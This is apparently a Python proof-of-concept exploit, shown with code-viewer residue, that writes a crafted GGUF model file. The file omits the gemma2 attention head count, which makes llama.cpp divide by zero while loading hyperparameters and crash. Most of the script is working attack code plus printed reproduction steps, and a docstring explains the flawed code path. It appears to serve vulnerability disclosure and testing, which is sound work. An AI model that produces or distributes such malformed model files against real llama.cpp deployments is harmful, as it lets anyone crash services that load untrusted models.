File size: 7,537 Bytes
ebf72e8
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
#!/usr/bin/env python3
"""
PoC: Integer division-by-zero (SIGFPE / UB) in llama.cpp gemma2 architecture loading.

Vulnerability: In src/llama-model.cpp, the LLM_ARCH_GEMMA2 handler computes:

    hparams.f_attention_scale = type == LLM_TYPE_27B
        ? 1.0f / std::sqrt(float(hparams.n_embd / hparams.n_head(0)))
        : 1.0f / std::sqrt(float(hparams.n_embd_head_k));

When n_layer == 46, the type is set to LLM_TYPE_27B, so the first branch is taken.
If the `attention.head_count` key is omitted from the GGUF file, the n_head_arr
stays filled with 0s (from std::fill at line 552), so n_head(0) returns 0.
This makes `hparams.n_embd / hparams.n_head(0)` an integer division by zero.

The guard at line 606 (`if (hparams.n_head() > 0)`) only protects the
n_embd_head_k calculation, not the architecture-specific code at line 1347.

Platform behavior:
  - x86_64: SIGFPE (hardware trap on integer division by zero), exit code 136
  - ARM64:  Silent undefined behavior (ARM SDIV returns 0 for div-by-zero),
            but UBSan catches it and aborts with exit code 134

Attack vector:
  1. Set general.architecture = "gemma2"
  2. Set gemma2.block_count = 46 (triggers LLM_TYPE_27B)
  3. Set gemma2.embedding_length = 4096 (any non-zero value)
  4. Set gemma2.context_length = 8192 (required)
  5. Set gemma2.attention.layer_norm_rms_epsilon = 1e-6 (required for gemma2)
  6. OMIT gemma2.attention.head_count (this is loaded with required=false)
  7. n_head_arr stays all-zero => n_head(0) == 0 => division by zero

The crash occurs during load_hparams(), before vocab or tensor loading,
so no valid vocabulary or tensor data is needed.

Confirmed UBSan output:
  src/llama-model.cpp:1347:61: runtime error: division by zero
  SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/llama-model.cpp:1347:61
"""

import os
import struct
import sys

# GGUF constants
GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3
GGUF_DEFAULT_ALIGNMENT = 32

# GGUF KV type constants
GGUF_TYPE_UINT32  = 4
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_STRING  = 8


def write_string(f, s):
    """Serialize *s* as a GGUF string: a little-endian uint64 byte length
    followed by the raw UTF-8 bytes (no null terminator)."""
    payload = s.encode('utf-8')
    f.write(struct.pack('<Q', len(payload)) + payload)


def write_kv_string(f, key, value):
    """Emit one GGUF KV pair with a string payload: key, type tag, value."""
    write_string(f, key)                          # key name
    f.write(struct.pack('<I', GGUF_TYPE_STRING))  # value-type tag
    write_string(f, value)                        # string payload


def write_kv_uint32(f, key, value):
    """Emit one GGUF KV pair with a little-endian uint32 payload."""
    write_string(f, key)
    # Type tag and value are both 4-byte little-endian words; pack them
    # in one call ('<' guarantees no struct padding between fields).
    f.write(struct.pack('<II', GGUF_TYPE_UINT32, value))


def write_kv_float32(f, key, value):
    """Emit one GGUF KV pair with an IEEE-754 float32 payload."""
    write_string(f, key)
    # Pack the uint32 type tag and the float32 value together; '<'
    # keeps the layout tightly packed and little-endian.
    f.write(struct.pack('<If', GGUF_TYPE_FLOAT32, value))


def create_gemma2_divzero_gguf(output_path):
    """Create a GGUF file that triggers integer division-by-zero in gemma2 hparams loading.

    The crash occurs in load_hparams() at the LLM_ARCH_GEMMA2 case, before
    vocab or tensor loading. So we need:
      - A valid GGUF v3 header
      - The required KV pairs for gemma2 (but NOT attention.head_count)
      - Zero tensors (the crash happens before tensors are loaded)

    Writes the PoC file to *output_path* and prints reproduction steps.
    """

    n_tensors = 0  # No tensors needed; crash is in hparams loading
    n_kv = 5       # Number of KV pairs (see below)

    with open(output_path, 'wb') as f:
        # ===== GGUF Header =====
        f.write(GGUF_MAGIC)                             # magic: "GGUF"
        f.write(struct.pack('<I', GGUF_VERSION))        # version: 3
        f.write(struct.pack('<Q', n_tensors))           # n_tensors: 0
        f.write(struct.pack('<Q', n_kv))                # n_kv: 5

        # ===== KV Pairs =====

        # 1. general.architecture = "gemma2"
        #    This selects LLM_ARCH_GEMMA2 in load_arch().
        write_kv_string(f, "general.architecture", "gemma2")

        # 2. gemma2.context_length = 8192
        #    Required (loaded at line 517 with required=true).
        write_kv_uint32(f, "gemma2.context_length", 8192)

        # 3. gemma2.embedding_length = 4096
        #    Required (loaded at line 518 with required=true).
        #    Must be non-zero so that n_embd / n_head(0) is a non-trivial division.
        write_kv_uint32(f, "gemma2.embedding_length", 4096)

        # 4. gemma2.block_count = 46
        #    Required (loaded at line 520 with required=true).
        #    46 layers triggers LLM_TYPE_27B at line 1341, which selects the
        #    vulnerable code path at line 1347 that divides by n_head(0).
        write_kv_uint32(f, "gemma2.block_count", 46)

        # 5. gemma2.attention.layer_norm_rms_epsilon = 1e-6
        #    Required for gemma2 (loaded at line 1334 with required=true).
        #    This must be present or load_hparams() throws before reaching line 1347.
        write_kv_float32(f, "gemma2.attention.layer_norm_rms_epsilon", 1e-6)

        # DELIBERATELY OMITTED: gemma2.attention.head_count
        # This key is loaded at line 571 with required=false:
        #   ml.get_key_or_arr(LLM_KV_ATTENTION_HEAD_COUNT, hparams.n_head_arr, hparams.n_layer, false);
        # When omitted, n_head_arr stays filled with 0s (from std::fill at line 552).
        # Then at line 1347: hparams.n_embd / hparams.n_head(0) = 4096 / 0 => SIGFPE

        # ===== Alignment padding =====
        # Even with 0 tensors, pad to alignment boundary for spec compliance.
        # -pos % align is the distance to the next multiple of align (0 if
        # already aligned) -- equivalent to the round-up-then-subtract idiom.
        padding = -f.tell() % GGUF_DEFAULT_ALIGNMENT
        if padding:
            f.write(b'\x00' * padding)

    file_size = os.path.getsize(output_path)
    print(f"[*] Created: {output_path}")
    print(f"[*] File size: {file_size} bytes")
    # Plain string literals below: f-prefixes removed where there is no
    # interpolation (ruff F541); printed text is unchanged.
    print("[*]")
    print("[*] Vulnerability details:")
    print("[*]   Architecture:  gemma2 (LLM_ARCH_GEMMA2)")
    print("[*]   block_count:   46 (triggers LLM_TYPE_27B)")
    print("[*]   embedding_length: 4096")
    print("[*]   head_count:    OMITTED (stays 0 from std::fill)")
    print("[*]")
    print("[*]   Crash location: src/llama-model.cpp:1347")
    print("[*]     hparams.n_embd / hparams.n_head(0)")
    print("[*]     = 4096 / 0")
    print("[*]     => integer division by zero (UB)")
    print("[*]")
    print("[*] Test with (x86_64 -- deterministic SIGFPE crash):")
    print(f"[*]   ./build/bin/llama-cli -m {output_path} -p 'hello'")
    print("[*]   Expected: SIGFPE, exit code 136")
    print("[*]")
    print("[*] Test with UBSan (any platform -- clean UB report):")
    print("[*]   cmake -B build-ubsan \\")
    print("[*]     -DCMAKE_C_FLAGS='-fsanitize=undefined -fno-sanitize-recover=all' \\")
    print("[*]     -DCMAKE_CXX_FLAGS='-fsanitize=undefined -fno-sanitize-recover=all' \\")
    print("[*]     -DCMAKE_EXE_LINKER_FLAGS='-fsanitize=undefined' \\")
    print("[*]     -DCMAKE_SHARED_LINKER_FLAGS='-fsanitize=undefined' \\")
    print("[*]     -DGGML_METAL=OFF -DGGML_BLAS=OFF -DGGML_CUDA=OFF")
    print("[*]   cmake --build build-ubsan -j$(nproc)")
    print(f"[*]   ./build-ubsan/bin/llama-completion -m {output_path} -p 'hello'")
    print("[*]   Expected: 'runtime error: division by zero', exit code 134")


if __name__ == "__main__":
    output_dir = "/Users/eltarne/Documents/script/gguf_poc"
    os.makedirs(output_dir, exist_ok=True)

    output_path = os.path.join(output_dir, "poc_gemma2_divzero.gguf")
    create_gemma2_divzero_gguf(output_path)